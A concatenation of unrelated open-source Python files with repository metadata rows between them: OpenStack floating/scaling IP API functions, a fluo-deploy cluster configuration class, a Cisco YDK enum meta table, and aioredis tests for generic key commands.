floating_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not floating_ip:
raise q_exc.FloatingIpNotFound(id=id)
return v._make_floating_ip_dict(floating_ip)
def get_floatingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of floating ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a floating ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
floating IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
"""
LOG.info('get_floatingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
floating_ips = _get_ips_by_type(context, ip_types.FLOATING,
filters=filters, fields=fields)
return [v._make_floating_ip_dict(flip) for flip in floating_ips]
def get_floatingips_count(context, filters=None):
"""Return the number of floating IPs.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a floating IP as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:returns: The number of floating IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
NOTE: this method is optional, as it was not part of the originally
defined plugin API.
"""
LOG.info('get_floatingips_count for tenant %s filters %s' %
(context.tenant_id, filters))
if filters is None:
filters = {}
filters['_deallocated'] = False
filters['address_type'] = ip_types.FLOATING
count = db_api.ip_address_count_all(context, filters)
LOG.info('Found %s floating ips for tenant %s' % (count,
context.tenant_id))
return count
def create_scalingip(context, content):
"""Allocate or reallocate a scaling IP.
:param context: neutron api request context.
:param content: dictionary describing the scaling ip, with keys
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py. All keys will be populated.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('create_scalingip for tenant %s and body %s',
context.tenant_id, content)
network_id = content.get('scaling_network_id')
ip_address = content.get('scaling_ip_address')
requested_ports = content.get('ports', [])
network = _get_network(context, network_id)
port_fixed_ips = {}
for req_port in requested_ports:
port = _get_port(context, req_port['port_id'])
fixed_ip = _get_fixed_ip(context, req_port.get('fixed_ip_address'),
port)
port_fixed_ips[port.id] = {"port": port, "fixed_ip": fixed_ip}
scip = _allocate_ip(context, network, None, ip_address, ip_types.SCALING)
_create_flip(context, scip, port_fixed_ips)
return v._make_scaling_ip_dict(scip)
def update_scalingip(context, id, content):
"""Update an existing scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_scalingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
requested_ports = content.get('ports', [])
flip = _update_flip(context, id, ip_types.SCALING, requested_ports)
return v._make_scaling_ip_dict(flip)
def delete_scalingip(context, id):
"""Deallocate a scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
"""
LOG.info('delete_scalingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.SCALING)
def get_scalingip(context, id, fields=None):
"""Retrieve a scaling IP.
:param context: neutron api request context.
:param id: The UUID of the scaling IP.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_scalingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.SCALING, '_deallocated': False}
scaling_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not scaling_ip:
raise q_exc.ScalingIpNotFound(id=id)
return v._make_scaling_ip_dict(scaling_ip)
def get_scalingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of scaling ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a scaling ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of scaling IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
"""
LOG.info('get_scalingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
scaling_ips = _get_ips_by_type(context, ip_types.SCALING,
filters=filters, fields=fields)
return [v._make_scaling_ip_dict(scip) for scip in scaling_ips]
| apache-2.0 | -7,158,888,643,166,104,000 | 39.076672 | 79 | 0.631294 | false |
ericnewton/fluo-deploy | bin/impl/fluo_deploy/config.py | 1 | 8132 | # Copyright 2014 Fluo authors (see AUTHORS)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ConfigParser import ConfigParser
from util import get_num_ephemeral, exit, get_arch, get_ami
import os
from os.path import join
SERVICES = ['zookeeper', 'namenode', 'resourcemanager', 'accumulomaster', 'worker', 'fluo', 'metrics']
class DeployConfig(ConfigParser):
def __init__(self, deploy_path, config_path, hosts_path, cluster_name):
ConfigParser.__init__(self)
self.deploy_path = deploy_path
self.read(config_path)
self.hosts_path = hosts_path
self.cluster_name = cluster_name
self.ephemeral_root = 'ephemeral'
self.mount_root = '/media/' + self.ephemeral_root
self.device_root = '/dev/xvd'
self.metrics_drive_root = 'media-' + self.ephemeral_root
self.node_d = None
self.hosts = None
self.init_nodes()
def verify_config(self, action):
proxy = self.get('general', 'proxy_hostname')
if not proxy:
exit("ERROR - proxy.hostname must be set in fluo-deploy.props")
if proxy not in self.node_d:
exit("ERROR - The proxy (set by property proxy.hostname={0}) cannot be found in 'nodes' section of fluo-deploy.props".format(proxy))
if action != 'launch':
self.proxy_public_ip()
if action in ['launch', 'setup']:
self.get_image_id(self.get('ec2', 'default_instance_type'))
self.get_image_id(self.get('ec2', 'worker_instance_type'))
for service in SERVICES:
if service not in ['fluo', 'metrics']:
if not self.has_service(service):
exit("ERROR - Missing '{0}' service from [nodes] section of fluo-deploy.props".format(service))
def init_nodes(self):
self.node_d = {}
for (hostname, value) in self.items('nodes'):
if hostname in self.node_d:
exit('Hostname {0} already exists twice in nodes'.format(hostname))
service_list = []
for service in value.split(','):
if service in SERVICES:
service_list.append(service)
else:
exit('Unknown service "%s" declared for node %s' % (service, hostname))
self.node_d[hostname] = service_list
def default_num_ephemeral(self):
return get_num_ephemeral(self.get('ec2', 'default_instance_type'))
def worker_num_ephemeral(self):
return get_num_ephemeral(self.get('ec2', 'worker_instance_type'))
def max_ephemeral(self):
return max((self.worker_num_ephemeral(), self.default_num_ephemeral()))
def node_type_map(self):
node_types = {}
node_list = [('default', self.default_num_ephemeral()), ('worker', self.worker_num_ephemeral())]
for (ntype, num_ephemeral) in node_list:
node_types[ntype] = {'mounts': self.mounts(num_ephemeral), 'devices': self.devices(num_ephemeral)}
return node_types
def node_type(self, hostname):
if 'worker' in self.node_d[hostname]:
return 'worker'
return 'default'
def num_ephemeral(self, hostname):
if 'worker' in self.node_d[hostname]:
return self.worker_num_ephemeral()
else:
return self.default_num_ephemeral()
def mounts(self, num_ephemeral):
mounts = []
for i in range(0, num_ephemeral):
mounts.append(self.mount_root + str(i))
return tuple(mounts)
def devices(self, num_ephemeral):
devices = []
for i in range(0, num_ephemeral):
devices.append(self.device_root + chr(ord('b') + i))
return tuple(devices)
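    # Worked example (drive count illustrative): with two ephemeral drives,
    # mounts(2) returns ('/media/ephemeral0', '/media/ephemeral1') and
    # devices(2) returns ('/dev/xvdb', '/dev/xvdc').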
def metrics_drive_ids(self):
drive_ids = []
for i in range(0, self.max_ephemeral()):
drive_ids.append(self.metrics_drive_root + str(i))
return tuple(drive_ids)
def version(self, software_id):
return self.get('general', software_id + '_version')
def sha256(self, software_id):
return self.get('general', software_id + '_sha256')
def get_image_id(self, instance_type):
if get_arch(instance_type) == 'pvm':
exit("ERROR - Configuration contains instance type '{0}' that uses pvm architecture. Only hvm architecture is supported!".format(instance_type))
return get_ami(instance_type, self.get('ec2', 'region'))
def instance_tags(self):
retd = {}
if self.has_option('ec2', 'instance.tags'):
value = self.get('ec2', 'instance.tags')
if value:
for kv in value.split(','):
(key, val) = kv.split(':')
retd[key] = val
return retd
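    # e.g. a config entry of `instance.tags = Owner:alice,Env:test` (names
    # illustrative) would be returned as {'Owner': 'alice', 'Env': 'test'}.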
def nodes(self):
return self.node_d
def get_node(self, hostname):
return self.node_d[hostname]
def has_service(self, service):
for (hostname, service_list) in self.node_d.items():
if service in service_list:
return True
return False
def get_host_services(self):
retval = []
for (hostname, service_list) in self.node_d.items():
retval.append((hostname, ' '.join(service_list)))
retval.sort()
return retval
def get_service_private_ips(self, service):
retval = []
for (hostname, service_list) in self.node_d.items():
if service in service_list:
retval.append(self.get_private_ip(hostname))
retval.sort()
return retval
def get_service_hostnames(self, service):
retval = []
for (hostname, service_list) in self.node_d.items():
if service in service_list:
retval.append(hostname)
retval.sort()
return retval
def get_non_proxy(self):
retval = []
proxy_ip = self.get_private_ip(self.get('general', 'proxy_hostname'))
for (hostname, (private_ip, public_ip)) in self.hosts.items():
if private_ip != proxy_ip:
retval.append((private_ip, hostname))
retval.sort()
return retval
def get_private_ip_hostnames(self):
retval = []
for (hostname, (private_ip, public_ip)) in self.hosts.items():
retval.append((private_ip, hostname))
retval.sort()
return retval
def parse_hosts(self):
if not os.path.isfile(self.hosts_path):
exit('ERROR - A hosts file does not exist at %s' % self.hosts_path)
self.hosts = {}
with open(self.hosts_path) as f:
for line in f:
line = line.strip()
if line.startswith("#") or not line:
continue
args = line.split(' ')
if len(args) == 2:
self.hosts[args[0]] = (args[1], None)
elif len(args) == 3:
self.hosts[args[0]] = (args[1], args[2])
else:
exit('ERROR - Bad line %s in hosts %s' % (line, self.hosts_path))
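    # Expected hosts file format: one `<hostname> <private_ip> [<public_ip>]`
    # entry per line, e.g. (addresses illustrative):
    #     leader1 10.0.0.5 203.0.113.7
    #     worker1 10.0.0.6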
def get_hosts(self):
if self.hosts is None:
self.parse_hosts()
return self.hosts
def get_private_ip(self, hostname):
return self.get_hosts()[hostname][0]
def get_public_ip(self, hostname):
return self.get_hosts()[hostname][1]
def proxy_public_ip(self):
retval = self.get_public_ip(self.get('general', 'proxy_hostname'))
if not retval:
exit("ERROR - Leader {0} does not have a public IP".format(self.get('general', 'proxy_hostname')))
return retval
def proxy_private_ip(self):
return self.get_private_ip(self.get('general', 'proxy_hostname'))
def get_performance_prop(self, prop):
profile = self.get('performance', 'profile')
return self.get(profile, prop)
def print_all(self):
print 'proxy_public_ip = ', self.proxy_public_ip()
for (name, val) in self.items('general'):
print name, '=', val
for (name, val) in self.items('ec2'):
print name, '=', val
def print_property(self, key):
if key == 'proxy.public.ip':
print self.proxy_public_ip()
return
else:
for section in self.sections():
if self.has_option(section, key):
print self.get(section, key)
return
exit("Property '{0}' was not found".format(key))
| apache-2.0 | 4,391,550,371,819,126,000 | 31.790323 | 151 | 0.641048 | false |
111pontes/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_aaa_diameter_oper.py | 1 | 2653 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'DisconnectCauseEnum' : _MetaInfoEnum('DisconnectCauseEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'reboot':'reboot',
'busy':'busy',
'do-not-wait-to-talk':'do_not_wait_to_talk',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'PeerEnum' : _MetaInfoEnum('PeerEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'undefined':'undefined',
'server':'server',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'PeerStateValueEnum' : _MetaInfoEnum('PeerStateValueEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'state-none':'state_none',
'closed':'closed',
'wait-connection-ack':'wait_connection_ack',
'wait-cea':'wait_cea',
'state-open':'state_open',
'closing':'closing',
'suspect':'suspect',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'WhoInitiatedDisconnectEnum' : _MetaInfoEnum('WhoInitiatedDisconnectEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'none':'none',
'host':'host',
'peer':'peer',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'ProtocolTypeValueEnum' : _MetaInfoEnum('ProtocolTypeValueEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'protocol-none':'protocol_none',
'tcp':'tcp',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
'SecurityTypeValueEnum' : _MetaInfoEnum('SecurityTypeValueEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_aaa_diameter_oper',
{
'security-type-none':'security_type_none',
'type':'type',
'ipsec':'ipsec',
}, 'Cisco-IOS-XR-aaa-diameter-oper', _yang_ns._namespaces['Cisco-IOS-XR-aaa-diameter-oper']),
}
| apache-2.0 | 3,088,936,458,861,376,000 | 48.12963 | 197 | 0.636261 | false |
ymap/aioredis | tests/generic_commands_test.py | 1 | 23698 | import asyncio
import time
import math
import pytest
import sys
from unittest import mock
from aioredis import ReplyError
async def add(redis, key, value):
ok = await redis.connection.execute('set', key, value)
assert ok == b'OK'
@pytest.mark.run_loop
async def test_delete(redis):
await add(redis, 'my-key', 123)
await add(redis, 'other-key', 123)
res = await redis.delete('my-key', 'non-existent-key')
assert res == 1
res = await redis.delete('other-key', 'other-key')
assert res == 1
with pytest.raises(TypeError):
await redis.delete(None)
with pytest.raises(TypeError):
await redis.delete('my-key', 'my-key', None)
@pytest.mark.run_loop
async def test_dump(redis):
await add(redis, 'my-key', 123)
data = await redis.dump('my-key')
assert data == mock.ANY
assert isinstance(data, (bytes, bytearray))
assert len(data) > 0
data = await redis.dump('non-existent-key')
assert data is None
with pytest.raises(TypeError):
await redis.dump(None)
@pytest.mark.run_loop
async def test_exists(redis, server):
await add(redis, 'my-key', 123)
res = await redis.exists('my-key')
assert isinstance(res, int)
assert res == 1
res = await redis.exists('non-existent-key')
assert isinstance(res, int)
assert res == 0
with pytest.raises(TypeError):
await redis.exists(None)
if server.version < (3, 0, 3):
with pytest.raises(ReplyError):
await redis.exists('key-1', 'key-2')
@pytest.redis_version(
    3, 0, 3, reason='Multi-key EXISTS available since redis>=3.0.3')
@pytest.mark.run_loop
async def test_exists_multiple(redis):
await add(redis, 'my-key', 123)
res = await redis.exists('my-key', 'other-key')
assert isinstance(res, int)
assert res == 1
res = await redis.exists('my-key', 'my-key')
assert isinstance(res, int)
assert res == 2
res = await redis.exists('foo', 'bar')
assert isinstance(res, int)
assert res == 0
@pytest.mark.run_loop
async def test_expire(redis):
await add(redis, 'my-key', 132)
res = await redis.expire('my-key', 10)
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res >= 10
await redis.expire('my-key', -1)
res = await redis.exists('my-key')
assert not res
res = await redis.expire('other-key', 1000)
assert res is False
await add(redis, 'my-key', 1)
res = await redis.expire('my-key', 10.0)
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res >= 10
with pytest.raises(TypeError):
await redis.expire(None, 123)
with pytest.raises(TypeError):
await redis.expire('my-key', 'timeout')
@pytest.mark.run_loop
async def test_expireat(redis):
await add(redis, 'my-key', 123)
now = math.ceil(time.time())
fut1 = redis.expireat('my-key', now + 10)
fut2 = redis.connection.execute('TTL', 'my-key')
assert (await fut1) is True
assert (await fut2) >= 10
now = time.time()
fut1 = redis.expireat('my-key', now + 10)
fut2 = redis.connection.execute('TTL', 'my-key')
assert (await fut1) is True
assert (await fut2) >= 10
res = await redis.expireat('my-key', -1)
assert res is True
res = await redis.exists('my-key')
assert not res
await add(redis, 'my-key', 123)
res = await redis.expireat('my-key', 0)
assert res is True
res = await redis.exists('my-key')
assert not res
await add(redis, 'my-key', 123)
with pytest.raises(TypeError):
await redis.expireat(None, 123)
with pytest.raises(TypeError):
await redis.expireat('my-key', 'timestamp')
@pytest.mark.run_loop
async def test_keys(redis):
res = await redis.keys('*pattern*')
assert res == []
await redis.connection.execute('FLUSHDB')
res = await redis.keys('*')
assert res == []
await add(redis, 'my-key-1', 1)
await add(redis, 'my-key-ab', 1)
res = await redis.keys('my-key-?')
assert res == [b'my-key-1']
res = await redis.keys('my-key-*')
assert sorted(res) == [b'my-key-1', b'my-key-ab']
# test with encoding param
res = await redis.keys('my-key-*', encoding='utf-8')
assert sorted(res) == ['my-key-1', 'my-key-ab']
with pytest.raises(TypeError):
await redis.keys(None)
@pytest.mark.run_loop
async def test_migrate(create_redis, loop, server, serverB):
redisA = await create_redis(server.tcp_address)
redisB = await create_redis(serverB.tcp_address, db=2)
await add(redisA, 'my-key', 123)
await redisB.delete('my-key')
assert (await redisA.exists('my-key'))
assert not (await redisB.exists('my-key'))
ok = await redisA.migrate(
'localhost', serverB.tcp_address.port, 'my-key', 2, 1000)
assert ok is True
assert not (await redisA.exists('my-key'))
assert (await redisB.exists('my-key'))
with pytest.raises(TypeError, match="host .* str"):
await redisA.migrate(None, 1234, 'key', 1, 23)
with pytest.raises(TypeError, match="args .* None"):
await redisA.migrate('host', '1234', None, 1, 123)
with pytest.raises(TypeError, match="dest_db .* int"):
await redisA.migrate('host', 123, 'key', 1.0, 123)
with pytest.raises(TypeError, match="timeout .* int"):
await redisA.migrate('host', '1234', 'key', 2, None)
with pytest.raises(ValueError, match="Got empty host"):
await redisA.migrate('', '123', 'key', 1, 123)
with pytest.raises(ValueError, match="dest_db .* greater equal 0"):
await redisA.migrate('host', 6379, 'key', -1, 1000)
with pytest.raises(ValueError, match="timeout .* greater equal 0"):
await redisA.migrate('host', 6379, 'key', 1, -1000)
@pytest.redis_version(
3, 0, 0, reason="Copy/Replace flags available since Redis 3.0")
@pytest.mark.run_loop
async def test_migrate_copy_replace(create_redis, loop, server, serverB):
redisA = await create_redis(server.tcp_address)
redisB = await create_redis(serverB.tcp_address, db=0)
await add(redisA, 'my-key', 123)
await redisB.delete('my-key')
ok = await redisA.migrate(
'localhost', serverB.tcp_address.port, 'my-key', 0, 1000, copy=True)
assert ok is True
assert (await redisA.get('my-key')) == b'123'
assert (await redisB.get('my-key')) == b'123'
assert (await redisA.set('my-key', 'val'))
ok = await redisA.migrate(
'localhost', serverB.tcp_address.port, 'my-key', 2, 1000, replace=True)
assert (await redisA.get('my-key')) is None
assert (await redisB.get('my-key'))
@pytest.redis_version(
3, 0, 6, reason="MIGRATE…KEYS available since Redis 3.0.6")
@pytest.mark.skipif(
sys.platform == 'win32', reason="Seems to be unavailable in win32 build")
@pytest.mark.run_loop
async def test_migrate_keys(create_redis, loop, server, serverB):
redisA = await create_redis(server.tcp_address)
redisB = await create_redis(serverB.tcp_address, db=0)
await add(redisA, 'key1', 123)
await add(redisA, 'key2', 123)
await add(redisA, 'key3', 123)
await redisB.delete('key1', 'key2', 'key3')
ok = await redisA.migrate_keys(
'localhost', serverB.tcp_address.port,
('key1', 'key2', 'key3', 'non-existing-key'),
dest_db=0, timeout=1000)
assert ok is True
assert (await redisB.get('key1')) == b'123'
assert (await redisB.get('key2')) == b'123'
assert (await redisB.get('key3')) == b'123'
assert (await redisA.get('key1')) is None
assert (await redisA.get('key2')) is None
assert (await redisA.get('key3')) is None
ok = await redisA.migrate_keys(
'localhost', serverB.tcp_address.port, ('key1', 'key2', 'key3'),
dest_db=0, timeout=1000)
assert not ok
ok = await redisB.migrate_keys(
'localhost', server.tcp_address.port, ('key1', 'key2', 'key3'),
dest_db=0, timeout=1000,
copy=True)
assert ok
assert (await redisB.get('key1')) == b'123'
assert (await redisB.get('key2')) == b'123'
assert (await redisB.get('key3')) == b'123'
assert (await redisA.get('key1')) == b'123'
assert (await redisA.get('key2')) == b'123'
assert (await redisA.get('key3')) == b'123'
assert (await redisA.set('key1', 'val'))
assert (await redisA.set('key2', 'val'))
assert (await redisA.set('key3', 'val'))
ok = await redisA.migrate_keys(
'localhost', serverB.tcp_address.port,
('key1', 'key2', 'key3', 'non-existing-key'),
dest_db=0, timeout=1000, replace=True)
assert ok is True
assert (await redisB.get('key1')) == b'val'
assert (await redisB.get('key2')) == b'val'
assert (await redisB.get('key3')) == b'val'
assert (await redisA.get('key1')) is None
assert (await redisA.get('key2')) is None
assert (await redisA.get('key3')) is None
@pytest.mark.run_loop
async def test_migrate__exceptions(redis, loop, server, unused_port):
await add(redis, 'my-key', 123)
assert (await redis.exists('my-key'))
with pytest.raises(ReplyError, match="IOERR .* timeout .*"):
assert not (await redis.migrate(
'localhost', unused_port(),
'my-key', dest_db=30, timeout=10))
@pytest.redis_version(
3, 0, 6, reason="MIGRATE…KEYS available since Redis 3.0.6")
@pytest.mark.skipif(
sys.platform == 'win32', reason="Seems to be unavailable in win32 build")
@pytest.mark.run_loop
async def test_migrate_keys__errors(redis):
with pytest.raises(TypeError, match="host .* str"):
await redis.migrate_keys(None, 1234, 'key', 1, 23)
with pytest.raises(TypeError, match="keys .* list or tuple"):
await redis.migrate_keys('host', '1234', None, 1, 123)
with pytest.raises(TypeError, match="dest_db .* int"):
await redis.migrate_keys('host', 123, ('key',), 1.0, 123)
with pytest.raises(TypeError, match="timeout .* int"):
await redis.migrate_keys('host', '1234', ('key',), 2, None)
with pytest.raises(ValueError, match="Got empty host"):
await redis.migrate_keys('', '123', ('key',), 1, 123)
with pytest.raises(ValueError, match="dest_db .* greater equal 0"):
await redis.migrate_keys('host', 6379, ('key',), -1, 1000)
with pytest.raises(ValueError, match="timeout .* greater equal 0"):
await redis.migrate_keys('host', 6379, ('key',), 1, -1000)
with pytest.raises(ValueError, match="keys .* empty"):
await redis.migrate_keys('host', '1234', (), 2, 123)
@pytest.mark.run_loop
async def test_move(redis):
await add(redis, 'my-key', 123)
assert redis.db == 0
res = await redis.move('my-key', 1)
assert res is True
with pytest.raises(TypeError):
await redis.move(None, 1)
with pytest.raises(TypeError):
await redis.move('my-key', None)
with pytest.raises(ValueError):
await redis.move('my-key', -1)
with pytest.raises(TypeError):
await redis.move('my-key', 'not db')
@pytest.mark.run_loop
async def test_object_refcount(redis):
await add(redis, 'foo', 'bar')
res = await redis.object_refcount('foo')
assert res == 1
res = await redis.object_refcount('non-existent-key')
assert res is None
with pytest.raises(TypeError):
await redis.object_refcount(None)
@pytest.mark.run_loop
async def test_object_encoding(redis, server):
await add(redis, 'foo', 'bar')
res = await redis.object_encoding('foo')
if server.version < (3, 0, 0):
assert res == b'raw'
else:
assert res == b'embstr'
res = await redis.incr('key')
assert res == 1
res = await redis.object_encoding('key')
assert res == b'int'
res = await redis.object_encoding('non-existent-key')
assert res is None
with pytest.raises(TypeError):
await redis.object_encoding(None)
@pytest.mark.run_loop(timeout=20)
async def test_object_idletime(redis, loop, server):
await add(redis, 'foo', 'bar')
res = await redis.object_idletime('foo')
# NOTE: sometimes travis-ci is too slow
assert res >= 0
res = 0
while not res:
res = await redis.object_idletime('foo')
await asyncio.sleep(.5, loop=loop)
assert res >= 1
res = await redis.object_idletime('non-existent-key')
assert res is None
with pytest.raises(TypeError):
await redis.object_idletime(None)
@pytest.mark.run_loop
async def test_persist(redis):
await add(redis, 'my-key', 123)
res = await redis.expire('my-key', 10)
assert res is True
res = await redis.persist('my-key')
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res == -1
with pytest.raises(TypeError):
await redis.persist(None)
@pytest.mark.run_loop
async def test_pexpire(redis, loop):
await add(redis, 'my-key', 123)
res = await redis.pexpire('my-key', 100)
assert res is True
res = await redis.connection.execute('TTL', 'my-key')
assert res == 0
res = await redis.connection.execute('PTTL', 'my-key')
assert res > 0
await add(redis, 'my-key', 123)
res = await redis.pexpire('my-key', 1)
assert res is True
    # XXX: this test now looks strange to me.
await asyncio.sleep(.2, loop=loop)
res = await redis.exists('my-key')
assert not res
with pytest.raises(TypeError):
await redis.pexpire(None, 0)
with pytest.raises(TypeError):
await redis.pexpire('my-key', 1.0)
@pytest.mark.run_loop
async def test_pexpireat(redis):
await add(redis, 'my-key', 123)
now = math.ceil((await redis.time()) * 1000)
fut1 = redis.pexpireat('my-key', now + 2000)
fut2 = redis.ttl('my-key')
fut3 = redis.pttl('my-key')
assert (await fut1) is True
assert (await fut2) == 2
pytest.assert_almost_equal((await fut3), 2000, -3)
with pytest.raises(TypeError):
await redis.pexpireat(None, 1234)
with pytest.raises(TypeError):
await redis.pexpireat('key', 'timestamp')
with pytest.raises(TypeError):
await redis.pexpireat('key', 1000.0)
@pytest.mark.run_loop
async def test_pttl(redis, server):
await add(redis, 'key', 'val')
res = await redis.pttl('key')
assert res == -1
res = await redis.pttl('non-existent-key')
if server.version < (2, 8, 0):
assert res == -1
else:
assert res == -2
await redis.pexpire('key', 500)
res = await redis.pttl('key')
pytest.assert_almost_equal(res, 500, -2)
with pytest.raises(TypeError):
await redis.pttl(None)
@pytest.mark.run_loop
async def test_randomkey(redis):
await add(redis, 'key:1', 123)
await add(redis, 'key:2', 123)
await add(redis, 'key:3', 123)
res = await redis.randomkey()
assert res in [b'key:1', b'key:2', b'key:3']
# test with encoding param
res = await redis.randomkey(encoding='utf-8')
assert res in ['key:1', 'key:2', 'key:3']
await redis.connection.execute('flushdb')
res = await redis.randomkey()
assert res is None
@pytest.mark.run_loop
async def test_rename(redis, server):
await add(redis, 'foo', 'bar')
await redis.delete('bar')
res = await redis.rename('foo', 'bar')
assert res is True
with pytest.raises(ReplyError, match='ERR no such key'):
await redis.rename('foo', 'bar')
with pytest.raises(TypeError):
await redis.rename(None, 'bar')
with pytest.raises(TypeError):
await redis.rename('foo', None)
with pytest.raises(ValueError):
await redis.rename('foo', 'foo')
if server.version < (3, 2):
with pytest.raises(ReplyError, match='.* objects are the same'):
await redis.rename('bar', b'bar')
@pytest.mark.run_loop
async def test_renamenx(redis, server):
await redis.delete('foo', 'bar')
await add(redis, 'foo', 123)
res = await redis.renamenx('foo', 'bar')
assert res is True
await add(redis, 'foo', 123)
res = await redis.renamenx('foo', 'bar')
assert res is False
with pytest.raises(ReplyError, match='ERR no such key'):
await redis.renamenx('baz', 'foo')
with pytest.raises(TypeError):
await redis.renamenx(None, 'foo')
with pytest.raises(TypeError):
await redis.renamenx('foo', None)
with pytest.raises(ValueError):
await redis.renamenx('foo', 'foo')
if server.version < (3, 2):
with pytest.raises(ReplyError, match='.* objects are the same'):
await redis.renamenx('foo', b'foo')
@pytest.mark.run_loop
async def test_restore(redis):
ok = await redis.set('key', 'value')
assert ok
dump = await redis.dump('key')
assert dump is not None
ok = await redis.delete('key')
assert ok
assert b'OK' == (await redis.restore('key', 0, dump))
assert (await redis.get('key')) == b'value'
@pytest.redis_version(2, 8, 0, reason='SCAN is available since redis>=2.8.0')
@pytest.mark.run_loop
async def test_scan(redis):
for i in range(1, 11):
foo_or_bar = 'bar' if i % 3 else 'foo'
key = 'key:scan:{}:{}'.format(foo_or_bar, i).encode('utf-8')
await add(redis, key, i)
cursor, values = await redis.scan()
    # compare with >= in case some other tests left test keys behind
assert len(values) >= 10
cursor, test_values = b'0', []
while cursor:
cursor, values = await redis.scan(
cursor=cursor, match=b'key:scan:foo*')
test_values.extend(values)
assert len(test_values) == 3
cursor, test_values = b'0', []
while cursor:
cursor, values = await redis.scan(
cursor=cursor, match=b'key:scan:bar:*')
test_values.extend(values)
assert len(test_values) == 7
    # SCAN family functions do not guarantee that the number of
    # elements returned per call is in a given range, so this is just a
    # dummy check that the *count* argument does not break anything
cursor = b'0'
test_values = []
while cursor:
cursor, values = await redis.scan(cursor=cursor,
match=b'key:scan:*',
count=2)
test_values.extend(values)
assert len(test_values) == 10
@pytest.mark.run_loop
async def test_sort(redis):
async def _make_list(key, items):
await redis.delete(key)
for i in items:
await redis.rpush(key, i)
await _make_list('a', '4231')
